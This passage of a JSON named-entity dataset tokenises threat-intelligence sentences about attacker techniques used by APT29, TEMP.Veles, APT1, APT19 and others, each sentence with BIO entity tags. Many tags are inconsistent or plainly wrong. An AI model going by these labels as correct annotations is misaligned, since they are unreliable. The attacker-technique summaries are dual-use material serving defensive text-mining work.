"tokens", "using", "compromised", "SAML", "signing", "certificates." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "administrative", "accounts", "to", "connect", "over", "SMB", "to", "targeted", "users." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "`scheduler`", "and", "`schtasks`", "to", "create", "new", "tasks", "on", "remote", "host", "as", "part", "of", "their", "lateral", "movement.", "They", "manipulated", "scheduled", "tasks", "by", "updating", "an", "existing", "legitimate", "task", "to", "execute", "their", "tools", "and", "then", "returned", "the", "scheduled", "task", "to", "its", "original", "configuration.", "APT29", "also", "created", "a", "scheduled", "task", "to", "maintain", "SUNSPOT", "persistence", "when", "the", "host", "booted." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "stole", "Chrome", "browser", "cookies", "by", "copying", "the", "Chrome", "profile", "directories", "of", "targeted", "users." ], "ner_tags": [ "O", "O", "B-Way", "B-Exp", "B-Idus", "O", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "`fsutil`", "to", "check", "available", "free", "space", "before", "executing", "actions", "that", "might", "create", "large", "files", "on", "disk." ], "ner_tags": [ "O", "O", "B-Exp", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "modified", "timestamps", "of", "backdoors", "to", "match", "legitimate", "Windows", "files." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "changed", "domain", "federation", "trust", "settings", "using", "Azure", "AD", "administrative", "permissions", "to", "configure", "the", "domain", "to", "accept", "authorization", "tokens", "signed", "by", "their", "own", "SAML", "signing", "certificate." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "gained", "access", "through", "compromised", "accounts", "at", "cloud", "solution", "partners,", "and", "used", "compromised", "certificates", "issued", "by", "Mimecast", "to", "authenticate", "to", "Mimecast", "customer", "systems." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "forged", "SAML", "tokens", "that", "allowed", "the", "actors", "to", "impersonate", "users", "and", "bypass", "MFA,", "enabling", "APT29", "to", "access", "enterprise", "cloud", "applications", "and", "services." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "I-Tool", "O", "B-Tool", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "different", "compromised", "credentials", "for", "remote", "access", "and", "to", "move", "laterally." ], "ner_tags": [ "O", "O", "B-Exp", "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "the", "SolarWinds", "Compromise,", "APT29", "wrote", "malware", "such", "as", "Sibot", "in", "Visual", "Basic." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "bypassed", "MFA", "set", "on", "OWA", "accounts", "by", "generating", "a", "cookie", "value", "from", "a", "previously", "stolen", "secret", "key." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "HTTP", "for", "C2", "and", "data", "exfiltration." ], "ner_tags": [ "O", "O", "B-Idus", "B-OffAct", "B-Idus", "O", "B-Way", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "stolen", "cookies", "to", "access", "cloud", "resources", "and", "a", "forged", "`duo-sid`", "cookie", "to", "bypass", "MFA", "set", "on", "an", "email", "account." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "`cmd.exe`", "to", "execute", "commands", "on", "remote", "machines." ], "ner_tags": [ "O", "O", "O", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "WMI", "for", "the", "remote", "execution", "of", "files", "for", "lateral", "movement." ], "ner_tags": [ "O", "O", "B-Idus", "B-Tool", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "a", "WMI", "event", "filter", "to", "invoke", "a", "command-line", "event", "consumer", "at", "system", "boot", "time", "to", "launch", "a", "backdoor", "with", "`rundll32.exe`." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "SolarWinds", "Compromise,", "APT29", "used", "WinRM", "via", "PowerShell", "to", "execute", "commands", "and", "payloads", "on", "remote", "hosts." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "B-Idus", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "engaged", "in", "network", "reconnaissance", "against", "targets", "of", "interest." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Exp", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "used", "cryptcat", "binaries", "to", "encrypt", "their", "traffic." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "modified", "files", "based", "on", "the", "open-source", "project", "cryptcat", "in", "an", "apparent", "attempt", "to", "decrease", "anti-virus", "detection", "rates." ], "ner_tags": [ "O", "O", "B-Org", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "B-Purp", "O" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "used", "Mimikatz." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "B-OffAct", "O", "B-Idus", "O", "B-Way" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "developed,", "prior", "to", "the", "attack,", "malware", "capabilities", "that", "would", "require", "access", "to", "specific", "and", "specialized", "hardware", "and", "software." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Exp", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "renamed", "files", "to", "look", "like", "legitimate", "files,", "such", "as", "Windows", "update", "files", "or", "Schneider", "Electric", "application", "files." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-OffAct", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "used", "a", "publicly", "available", "PowerShell-based", "tool,", "WMImplant." ], "ner_tags": [ "O", "O", "B-Org", "O", "I-OffAct", "I-OffAct", "O", "B-Idus", "O", "O", "I-Tool", "I-Tool", "B-Way", "B-Tool", "B-Way" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "installed", "scheduled", "tasks", "defined", "in", "XML", "files." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-Exp", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "used", "tools", "such", "as", "Mimikatz", "and", "other", "open-source", "software." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "I-OffAct", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "In", "the", "Triton", "Safety", "Instrumented", "System", "Attack,", "TEMP.Veles", "captured", "credentials", "as", "they", "were", "being", "changed", "by", "redirecting", "text-based", "login", "codes", "to", "websites", "they", "controlled." ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT-C-36", "has", "downloaded", "binary", "data", "from", "a", "specified", "domain", "after", "the", "malicious", "document", "is", "opened." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT-C-36", "has", "prompted", "victims", "to", "accept", "macros", "in", "order", "to", "execute", "the", "subsequent", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT-C-36", "has", "disguised", "its", "scheduled", "tasks", "as", "those", "used", "by", "Google." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "APT-C-36", "has", "used", "port", "4050", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "APT-C-36", "has", "used", "ConfuserEx", "to", "obfuscate", "its", "variant", "of", "Imminent", "Monitor,", "compressed", "payload", "and", "RAT", "packages,", "and", "password", "protected", "encrypted", "email", "attachments", "to", "avoid", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT-C-36", "has", "used", "a", "macro", "function", "to", "set", "scheduled", "tasks,", "disguised", "as", "those", "used", "by", "Google." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "APT-C-36", "has", "used", "spearphishing", "emails", "with", "password", "protected", "RAR", "attachment", "to", "avoid", "being", "detected", "by", "the", "email", "gateway." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "APT-C-36", "obtained", "and", "used", "a", "modified", "variant", "of", "Imminent", "Monitor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "APT-C-36", "has", "embedded", "a", "VBScript", "within", "a", "malicious", "Word", "document", "which", "is", "executed", "upon", "the", "document", "opening." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "has", "used", "RAR", "to", "compress", "files", "before", "moving", "them", "outside", "of", "the", "victim", "network." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "used", "a", "batch", "script", "to", "perform", "a", "series", "of", "discovery", "techniques", "and", "saves", "it", "to", "a", "text", "file." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "has", "collected", "files", "from", "a", "local", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "has", "registered", "hundreds", "of", "domains", "for", "use", "in", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "hijacked", "FQDNs", "associated", "with", "legitimate", "websites", "hosted", "by", "hop", "points." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "has", "created", "email", "accounts", "for", "later", "use", "in", "social", "engineering,", "phishing,", "and", "when", "registering", "domains." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "has", "been", "known", "to", "use", "credential", "dumping", "using", "Mimikatz." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "APT1", "used", "the", "commands", "<code>net", "localgroup</code>,<code>net", "user</code>,", "and", "<code>net", "group</code>", "to", "find", "accounts", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT1", "uses", "two", "utilities,", "GETMAIL", "and", "MAPIGET,", "to", "steal", "email.", "GETMAIL", "extracts", "emails", "from", "archived", "Outlook", ".pst", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "APT1", "used", "publicly", "available", "malware", "for", "privilege", "escalation." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "The", "file", "name", "AcroRD32.exe,", "a", "legitimate", "process", "name", "for", "Adobe's", "Acrobat", "Reader,", "was", "used", "by", "APT1", "as", "a", "name", "for", "malware." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "listed", "connected", "network", "shares." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "The", "APT1", "group", "is", "known", "to", "have", "used", "pass", "the", "hash." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "gathered", "a", "list", "of", "running", "processes", "on", "the", "system", "using", "<code>tasklist", "/v</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "APT1", "group", "is", "known", "to", "have", "used", "RDP", "during", "operations." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "APT1", "uses", "two", "utilities,", "GETMAIL", "and", "MAPIGET,", "to", "steal", "email.", "MAPIGET", "steals", "email", "still", "on", "Exchange", "servers", "that", "has", "not", "yet", "been", "archived." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "has", "sent", "spearphishing", "emails", "containing", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "APT1", "has", "sent", "spearphishing", "emails", "containing", "hyperlinks", "to", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "used", "the", "<code>ipconfig", "/all</code>", "command", "to", "gather", "network", "configuration", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "used", "the", "<code>net", "use</code>", "command", "to", "get", "a", "listing", "on", "network", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "used", "the", "commands", "<code>net", "start</code>", "and", "<code>tasklist</code>", "to", "get", "a", "listing", "of", "the", "services", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT1", "has", "used", "various", "open-source", "tools", "for", "privilege", "escalation", "purposes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "APT1", "has", "used", "the", "Windows", "command", "shell", "to", "execute", "commands,", "and", "batch", "scripting", "to", "automate", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT12", "has", "used", "blogs", "and", "WordPress", "for", "C2", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT12", "has", "used", "multiple", "variants", "of", "DNS", "Calculation", "including", "multiplying", "the", "first", "two", "octets", "of", "an", "IP", "address", "and", "adding", "the", "third", "octet", "to", "that", "value", "in", "order", "to", "get", "a", "resulting", "command", "and", "control", "port." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT12", "has", "exploited", "multiple", "vulnerabilities", "for", "execution,", "including", "Microsoft", "Office", "vulnerabilities", "(CVE-2009-3129,", "CVE-2012-0158)", "and", "vulnerabilities", "in", "Adobe", "Reader", "and", "Flash", "(CVE-2009-4324,", "CVE-2009-0927,", "CVE-2011-0609,", "CVE-2011-0611)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "B-Features", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Tool", "B-Features", "B-Features", "B-Features", "B-Features" ] }, { "tokens": [ "APT12", "has", "attempted", "to", "get", "victims", "to", "open", "malicious", "Microsoft", "Word", "and", "PDF", "attachment", "sent", "via", "spearphishing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-SamFile", "O", "I-Tool", "I-Tool", "O", "O", "B-Way" ] }, { "tokens": [ "APT12", "has", "sent", "emails", "with", "malicious", "Microsoft", "Office", "documents", "and", "PDFs", "attached." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT16", "has", "compromised", "otherwise", "legitimate", "sites", "as", "staging", "servers", "for", "second-stage", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT17", "has", "created", "and", "cultivated", "profile", "pages", "in", "Microsoft", "TechNet.", "To", "make", "profile", "pages", "appear", "more", "legitimate,", "APT17", "has", "created", "biographical", "sections", "and", "posted", "in", "forum", "threads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT17", "has", "created", "profile", "pages", "in", "Microsoft", "TechNet", "that", "were", "used", "as", "C2", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT18", "actors", "used", "the", "native", "at", "Windows", "task", "scheduler", "tool", "to", "use", "scheduled", "tasks", "for", "execution", "on", "a", "victim", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT18", "uses", "DNS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT18", "obfuscates", "strings", "in", "the", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT18", "actors", "leverage", "legitimate", "credentials", "to", "log", "into", "external", "remote", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "B-Purp" ] }, { "tokens": [ "APT18", "actors", "deleted", "tools", "and", "batch", "files", "from", "victim", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT18", "can", "list", "files", "information", "for", "specific", "directories." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "APT18", "can", "upload", "a", "file", "to", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT18", "establishes", "persistence", "via", "the", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT18", "can", "collect", "system", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT18", "actors", "leverage", "legitimate", "credentials", "to", "log", "into", "external", "remote", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "B-Purp" ] }, { "tokens": [ "APT18", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT18", "uses", "cmd.exe", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "used", "Base64", "to", "obfuscate", "executed", "commands." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "downloaded", "and", "launched", "code", "within", "a", "SCT", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "APT19", "launched", "an", "HTTP", "malware", "variant", "and", "a", "Port", "22", "malware", "variant", "using", "a", "legitimate", "executable", "that", "loaded", "the", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT19", "HTTP", "malware", "variant", "decrypts", "strings", "using", "single-byte", "XOR", "keys." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "performed", "a", "watering", "hole", "attack", "on", "forbes.com", "in", "2014", "to", "compromise", "targets." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O", "B-Time", "O", "O", "O" ] }, { "tokens": [ "APT19", "used", "Base64", "to", "obfuscate", "payloads." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT19", "used", "<code>-W", "Hidden</code>", "to", "conceal", "PowerShell", "windows", "by", "setting", "the", "WindowStyle", "parameter", "to", "hidden." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT19", "attempted", "to", "get", "users", "to", "launch", "malicious", "attachments", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT19", "uses", "a", "Port", "22", "malware", "variant", "to", "modify", "several", "Registry", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "used", "PowerShell", "commands", "to", "execute", "payloads." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "An", "APT19", "HTTP", "malware", "variant", "establishes", "persistence", "by", "setting", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows", "Debug", "Tools-%LOCALAPPDATA%\\</code>." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "used", "Regsvr32", "to", "bypass", "application", "control", "techniques." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "configured", "its", "payload", "to", "inject", "into", "the", "rundll32.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "APT19", "sent", "spearphishing", "emails", "with", "malicious", "attachments", "in", "RTF", "and", "XLSM", "formats", "to", "deliver", "initial", "exploits." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "An", "APT19", "HTTP", "malware", "variant", "used", "Base64", "to", "encode", "communications", "to", "the", "C2", "server." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "collected", "system", "architecture", "information.", "APT19", "used", "an", "HTTP", "malware", "variant", "and", "a", "Port", "22", "malware", "variant", "to", "gather", "the", "hostname", "and", "CPU", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "used", "an", "HTTP", "malware", "variant", "and", "a", "Port", "22", "malware", "variant", "to", "collect", "the", "MAC", "address", "and", "IP", "address", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "used", "an", "HTTP", "malware", "variant", "and", "a", "Port", "22", "malware", "variant", "to", "collect", "the", "victim’s", "username." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT19", "has", "obtained", "and", "used", "publicly-available", "tools", "like", "Empire." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "APT19", "used", "HTTP", "for", "C2", "communications.", "APT19", "also", "used", "an", "HTTP", "malware", "variant", "to", "communicate", "over", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "An", "APT19", "Port", "22", "malware", "variant", "registers", "itself", "as", "a", "service." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT28", "has", "used", "a", "Powershell", "cmdlet", "to", "grant", "the", "<code>ApplicationImpersonation</code>", "role", "to", "a", "compromised", "account." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" 